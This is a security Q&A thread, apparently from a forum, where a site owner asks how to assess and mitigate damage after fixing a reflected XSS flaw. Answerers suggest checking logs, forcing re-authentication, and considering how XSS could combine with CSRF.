2

I found reflected XSS on my website. And its fixed now. There are a lot of websites which tell how a XSS can be detected or what can be compromised but I could not find what measures should be taken after a XSS has been found. I know what an attacker can do using an XSS. Basically, all the cookies and session info can be compromised.

  1. How do I find out what was compromised? (I suppose there is no way to find this out but I want to be sure if there is a way.)
  2. What should I do mitigate the damage done to my website, if any?
TheRookierLearner
  • 4,222
  • 8
  • 24
  • 28

2 Answers2

4

The first step is to patch the vulnerability by escaping any HTML entities or removing any dangerous characters all together.

Reflected XSS is a client-side attack method, caused by a server side vulnerability. I wouldn't worry too much about any damages if you didn't catch an XSS worm in action or actually saw anyone using the exploit to attack other users. Just because you found a vulnerability in your code doesn't necessarily mean it has been exploited.

Most often XSS bugs aren't looked for as quickly as something like SQL injection or server side code executing has a way more devastating impact as it hits the server rather than the client. You could try looking in your web server's logs, or query your database for any strange characters such as < or > which are often required to perform XSS based attacks.

Any other way to prevent stolen cookies from being re-used is by forcing all your users to re-authenticate.

k1DBLITZ
  • 3,933
  • 14
  • 20
Paradoxis
  • 892
  • 7
  • 15
3

What should I do to mitigate the damage?

Usually, it is the user's browser that is compromised by XSS vulnerabilities on web sites. You probably won't see any damage done to your site, especially since it was reflected XSS. The attacker would need to target each user separately and convince them to click a malicious link in an email or visit a malicious domain that could launch the attack.

That said, reflected XSS is sneaky and can be combined with other attacks (like CSRF) and that CAN damage a web site. Let's say I achieve a reflected XSS attack where it rewrites all the links on the page to links that can change things on your site. For example, rewrite links to www.example.com/records?record_id=3&action=delete. Now you have a script that can delete records under the authority of whatever user has had their browser compromised by XSS.

I don't believe too many web site owners do a lot of investigation when they find and fix an XSS problem unless there is evidence of an actual exploit.

How to Find out What was Compromised:

If your application writes detailed logs, you might have records of http requests with malicious scripts in the parameters.

If any users have complained that that their stuff has been altered or deleted without their consent, that might also be a clue that someone has taken advantage of the XSS.

For more information, please describe what your web application does and what technologies it uses. You could even post a link to it if you don't mind the attention. That would give the people here more to go on.

Benoit Esnard
  • 13,942
  • 7
  • 65
  • 65
mcgyver5
  • 6,807
  • 2
  • 24
  • 45